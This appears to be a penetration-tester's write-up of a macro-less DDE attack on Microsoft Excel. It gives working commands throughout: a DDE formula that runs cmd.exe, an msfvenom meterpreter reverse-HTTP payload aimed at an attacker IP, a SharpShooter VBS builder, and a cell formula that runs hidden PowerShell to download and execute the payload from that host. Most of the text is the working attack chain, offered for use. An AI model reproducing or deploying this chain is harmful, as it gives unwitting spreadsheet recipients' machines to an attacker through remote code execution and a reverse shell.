DDE Auto - Microsoft Office Word/Excel

Macro-less Client Side Attack

This attack has been tested on the latest Windows10 LTSC edition with Microsoft Office 365 with up-to-date Windows Defender.

Requirements:

For this attack to succeed Enable Dynamic Data Exchange Launch needs to be enabled.

Warning presented to the user who opens the worksheet:

CMD.EXE can be changed to something more pleasant, such as MSEXCEL

Inserted command in Excel function:

=cmd|'/c cmd.exe /c calc.exe'!'A1'
Calc popped - possibility of code execution - give me a meterpreter shell!

Now that we have tested for a possible code execution it is time to see how far we can take this vulnerability to. I have set up an objective of obtaining a meterpreter shell.

First, generate msfvenom shellcode:

msfvenom -a x86 -p windows/meterpreter/reverse_http LHOST=192.168.1.108 LPORT=443 EnableStageEncoding=True PrependMigrate=True -f raw -o raw3.txt

Change the values of -a (architecture) LHOST=attacker IP LPORT=attacker PORT according to your system.

Create a malicious VBS script with SharpShooter with included raw3.txt shellcode file we generated earlier:

python2 SharpShooter.py --stageless --dotnetver 2 --payload vbs --output foo2 --rawscfile raw3.txt --amsi amsienable

And inject the command to Microsoft Excel function...function:)

=cmd|'/c cmd.exe /c powershell.exe -nop -w hidden iwr -outf %tmp%\\msf.vbs http://192.168.1.108:8000/foo2.vbs & %tmp%\\msf.vbs'!'A1'

After the user skips the warning we get a meterpreter shell:

‚Äč